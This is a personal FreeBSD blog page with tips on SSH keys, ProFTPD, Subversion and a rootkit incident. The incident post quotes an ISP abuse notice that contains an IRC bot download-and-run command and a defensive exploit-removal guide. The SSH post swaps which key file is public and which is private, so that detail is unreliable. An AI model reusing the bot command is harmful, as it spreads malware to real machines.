header

How to SSH w/o a password on FreeBSD

Adapted from a Berkeley Guide, if you want to be able to SSH from unix or linux boxes (e.g. FreeBSD) without having to repeatedly put in the password, this guide will show you how to do that.

First step, on the client do the following:

mkdir -p ~/.ssh
chmod 700 ~/.ssh
ssh-keygen -t rsa

Have it use the default location (~/.ssh/id_rsa), and make sure there is no passkey. This creates a file containing the public key (id_rsa) and a file containing the private key (id_rsa.pub).

There should be one line of text in id_rsa.pub. Copy it to the server, putting it in ~/.ssh/authorized_keys2. Then execute this command:

chmod 600 authorized_keys2

That’s it! Now connection from the client to the server with this command

ssh server

If that doesn’t work (i.e. it prompts for your password), you may have to try a few things. On one box that I tried, it worked as above. On another, I had to do the following.

ssh -i ~/.ssh/id_rsa server

If that works, add or create the file and insert these two lines to ~/.ssh/config

Host server
{tab}IdentityFile ~/.ssh/id_rsa

If you SSH as much as I do, this can save lots of time.

Comments (3)

Proftpd on FreeBSD delay after “Waiting for welcome message…”

I’ve run an FTP server for some time, and it was a minor problem to me that it would always lag a bit on connection. The connection would be something like this:

Status: Connecting to {server url}
Status: Connected with {server url}. Waiting for welcome message...
{10-20 second delay}
Response: 220 {Server Name} (the HELO)

That 10-20 second delay was caused by a DNS lookup, whether failed or succeeded I had no need for it. Truthfully in my /var/log/xferlog I’d rather see
24.20.96.1XX rather than
c-24-20-96-1XX.hsd1.wa.comcast.net

So to fix it, I added these lines to my /usr/local/etc/proftpd.conf:

#to enable faster logins
UseReverseDNS off
IdentLookups off

Then restarted the server


root@sam# /usr/local/etc/rc.d/proftpd.sh restart
Stopping proftpd.
Waiting for PIDS: 577.
Starting proftpd.
root@sam#

And wha-la, instead of it taking 20+ seconds to connect and authenticate with my server, it’s done within 3 seconds.

Comments (2)

FreeBSD SSH session timeouts

I was tired of seeing this while logging into my server via SSH:

Read from remote host raybdbomb.com: Connection reset by peer

I messed around with the sshd config a bit and wasn’t able to get it to go away. I’m pretty sure that the connection is being closed by some firewall in the interim. So for a solution, I installed spinner.


cd /usr/ports/sysutils/spinner/
make install clean
spinner

It puts a character on the top left of the console, which keeps the session alive with minimal amounts of data transfer.

Works great! 🙂

Comments (1)

How to setup a Subversion server and repository on FreeBSD

I had some trouble with this some months ago, so I thought I would create a guide to do it for my own future reference. The OS I used for this guide was FreeBSD 5.4, but it stands to reason that it would work on others.

First, install subversion from the ports

[root@sam ~]# cd /usr/ports/devel/subversion
[root@sam /usr/ports/devel/subversion]# make install clean

Next, add a user for the subversion server to run under. I made mine “svn” at “/home/svn”. And I made a directory for the repository “/home/svn/rep”.

Next, setup your /etc/rc.conf so that the svn server will start on boot, or start at all. Append this to /etc/rc.conf

#svn server
svnserve_enable="YES"
#svnserve_flags="-d --listen-port=3690 --listen-host=0.0.0.0"
svnserve_flags="-d -r /home/svn/rep --listen-host=0.0.0.0"
svnserve_data="/home/svn/rep"
svnserve_user="svn"
svnserve_group="svn"

Start your svn server

[root@sam ~]# /usr/local/etc/rc.d/svnserve.sh start

Create the repository with svn

[root@sam ~]# svnadmin create /home/svn/rep

Explicitly set the password file, edit {repository}/conf/svnserve.conf and uncomment the line

password-db = passwd

and do whatever other edits to fine tune your repository.

Edit the password file to your liking, setting up a user with write access. The password file is {repository}/conf/passwd

And wha-la, presto 🙂

Comments (1)

Root (wute) Kit

Yea, so I received this e-mail from my ISP:

Subject: Policy Enforcement of LTSV-## at {my IP} for IRC Malicious

NOTES: Remove the IRCd software from this server. It is being used for malicious intent.
QUOTE FROM THE
Axxx has changed the topic on channel #lucky to “.dl http://(url)/a.goud5/install.exe a.exe 1 -s”
.l ………. -s
.q

NOTES: I have added an Exploit Removal Guide below my signature block. This will help search for commonw exploits.

Dear Client,

This is a Policy Enforcement Notice that your server has violated our Acceptable Use Policy available at http://www.layeredtech.com/aup.shtml. Please refer to the attached complaints and/or logs of abuse. If you believe we have traced this issue to you erroneously, our staff will investigate the issue further.

IT IS YOUR RESPONSIBILITY TO REMOVE ALL DOMAINS, USERS, AND CONTENT CAUSING THIS ABUSE ISSUE AND TO INVESTIGATE ANY MISCONFIGURED, INFECTED, OR UNAUTHORIZED USE OF SOFTWARE.

PENDING YOUR REQUIRED REPLY WITH YOUR COMMENTS, QUESTIONS, OR ACTIONS TO RESOLVE THIS ISSUE, THE SERVER IS:

[] Monitored for Additional Violations
[] Accessed for Investigation, Cleaning, Hardening, or Securing
[x] Disconnected in: [] 24-Hours [x] 12-Hours [] 6-Hours [] 1-Hour [] 0-Hours
[] Required Reload Request with: [] New Client Required [] No Data Recovery [] Data Recovery Allowed
at http://support.layeredtech.com under “Open a Ticket”
[] Hard Drives Seized for Investigation
[] Null-Routed
[] Port Shutdown
[] On 30-Day Probation
[] Reviewed for Possible Cancellation
[] Cancelled

FOR THE FOLLOWING REASONS:

[] Child Porn C Hosting, Distributing, or Linking to Pornography Involving a Person Under Legal Age
[] Copyright L Hosting, Distributing, or Linking to Copyright Infringed Materials
[] Cracking H Brute Force Access of Secured Network Devices
[] DoS H Denial of Service Attack of Network Devices
[] Forgery M Faking an IP Address, Hostname, E-Mail Address, or Header
[] Fraud Site H Hosting or Linking to a Website Intended to Deceive the Public
[] Hacking H Circumventing Security Systems of Network Devices
[] HYIP Site M Hosting or Linking to a Website of High Yield Investment Program, Ponzi Scheme, or Pyramid Scheme
[] ID Theft H Hosting, Distributing, or Linking to Stolen Account Identification Information
[] Infection H Hosting, Distributing, or Linking to Exploits, Trojans, Viruses, or Worms
[x] IRC Malicious M Malicious Use of Internet Relay Chat
[] IRC Unregistered L Internet Relay Chat Server not Registerd with Layered Technologies
[] Phishing H Identity Theft by Email Under False Pretense
[] ROKSO Spamhaus C ROKSO Blacklisting of an IP at www.spamhaus.org for Malicious Activity
[] Scanning H Probing for Vulnerabilities of Network Devices
[] Shells H Hosting Accounts Primarily for Shell Access
[] Spam Cannon E Sending High Volume Spam (UCE or UBE)
[] Spam Email L Unsolicited Commercial Email (UCE) or Unsolicited Bulk Email (UBE)
[] Spam List M Hosting, Distributing, or Linking to Email Address Lists for Spam
[] Spam Proxy C Hosting an Open Proxy Server Used for Spam
[] Spam Relay C Hosting an Open Mail Rely Used for Spam
[] Spam Hijack C Distributing Spam Through a Third Party Server Vulnerability
[] Spam Site L A Site Advertised by Spam Email or Spam Web
[] Spam Ware H Hosting, Distributing, or Linking to Software Designed for Spamming
[] Spam Web L Unsolicited, Bulk, or Forged Site Advertisement in Web Logs, Forums, or Guestbooks
[] Terrorist Site C Hosting or Linking to a Site Advocating Terrorism
[] Toolz L Hosting, Distributing, or Linking to Cracking, DoS, Forgery, Infection, or Scanning Software or Instruction
[] Trademark L Hosting, Distributing, or Linking to Trade Mark Infringed Materials
[] Warez L Hosting, Distributing, or Linking to Crackz, Hackz, KeyGenz, Serialz, or Pirated Software

[] OTHER:

Thank you for your cooperation,

Layered Technologies Abuse Team

On Thu, 02 Mar 2006 13:01:42 -0600, pen@ev6.net wrote:

>> hello,
>>
>> recently stumbled onto a drone ircd on your network, {my IP}:8080,
>> channel #lucky.
>>
>> i was going to contact the customer directly but thier whois info
>> provides no abuse contact or any other usable contact.
>>
>> please null route this ip immediately. the bots on this server are being
>> used to DDoS a customer of ours..
>>
>>
>> thanks,
>> jl, ev6 networks.

Thank you,

Tom
Layered Technologies
Policy Enforcement Technician

ACCEPTABLE USE POLICY at http://layeredtech.com/aup.shtml

### Exploit Removal Guide ###

The following is a first step in finding and removing exploits and root kits on a Linux or BSD system.

1. EXECUTE THE FOLLOWING COMMANDS TO HELP PREVENT UPLOADS OF EXPLOITS:

chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-

2. EXECUTE THE FOLLOWING COMMANDS TO CHECK FOR POSSIBLE EXISTING EXPLOITS:

sh
for x in “/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp”; do ls -loAFR $x 2>&- | grep -E “^$|^/| apache | nobody | unknown | www | web ” | grep -E “^$|^/|/$|\*$|\.pl$” | tee exploits.txt; done; echo -e “\n\nPossible Exploit Files and Directories: `grep -Ev “^$|^/” exploits.txt | wc -l | tr -d ‘ ‘`” | tee -a exploits.txt
exit

Lines ending with an asterisk ‘*’, ‘.pl’, or a slash ‘/’ are possible exploit files or directories which should be investigated and removed followed by rebooting the server to kill any running exploit processes. You can refer to the exploits.txt file generated by the above commands for later reference.

3. You should also install and run the progam called rkhunter.

Rootkit Hunter is scanning tool to ensure you for about 99.9% you’re clean of nasty tools.

This tool scans for rootkits, backdoors and local exploits by running tests like:

– MD5/SHA1 hash compare
– Look for default files used by rootkits
– Wrong file permissions for binaries
– Look for suspected strings in LKM and KLD modules
– Look for hidden files
– Optional scan within plaintext and binary files

WWW: http://www.rootkit.nl/

On BSD sytems:
cd /usr/ports/security/rkhunter; make install clean; rehash; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

On RedHat, Fedora, CentOS systems:
yum -y install rkhunter; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

If you cannot do this, our staff will clean, harden, and secure the server for you for a fee or or you can have a 3rd party company to do it.

If you cannot secure your server, you should issue a Reload Request of your system at http://support.layeredtech.com under “Open A Ticket”.

And the Rootkit Hunter didn’t find any rootkits… unfortunately. So, it’s time to do a system refresh. I sent this e-mail to the owners of the domains that I host:

Dear “clients”:

The server, nooblet.us which hosts your domain(s), files or e-mails nicely acquired a rootkit today (http://en.wikipedia.org/wiki/Rootkit). I was unable to find out what caused it, or even where it resides, so my ISP strongly recommends I do an OS reload (very soon). I will being the OS reload on Friday, March 2nd, 2006 (tomorrow), at approximately 2 p.m. PST.

I have installed lots of software on this server, so it might take me awhile to get it all caught up and reinstalled. Hopefully I can get it completed within 1 day. During this time, your mail, files, and everything else associated with your domains will not be available.
Also, it has come to my attention that too many of you have ssh access. This is essentially what caused the problem. Unless you make a deal with me to pay for some of the cost of the server, ssh access will be limited to me alone, you will instead only have ftp access to write files to the server. If you need ssh access, send me a message after I restore the server and we can negotiate a price.

The information that *will not* be lost during the server move includes:
1. Files. I have backed up all of the files for your domain and will restore it as soon as I can. My home system has a 30KB/s upload limit, so it might take awhile.
2. Domain Configuration. I have backed up the “named” files, so restoring this information should be the first to be done.

The information that *will* be lost during the server move includes:
1. E-mail accounts. This includes both the e-mails themselves and the login/password information. If you want to backup your e-mails, I’d suggest you do that as soon as possible, because it WILL be gone on Friday.
2. Username/password pair combinations. Your login will be lost. I will provide you with your username and a dummy password when the server is restored.

My e-mail {} will be down during the transition, so you can e-mail RnospamDEHLER(at)gmail.com in the meantime with questions or comments.

Sorry for the inconvenience, but really I’m just as inconvenienced as you, if not more.

Please send me your non-nooblet.us hosted e-mail to RnospamDEHLER(at)gmail.com and I can provide you with updates as they come.

Bummer, eh?

Comments (2)


blogtimes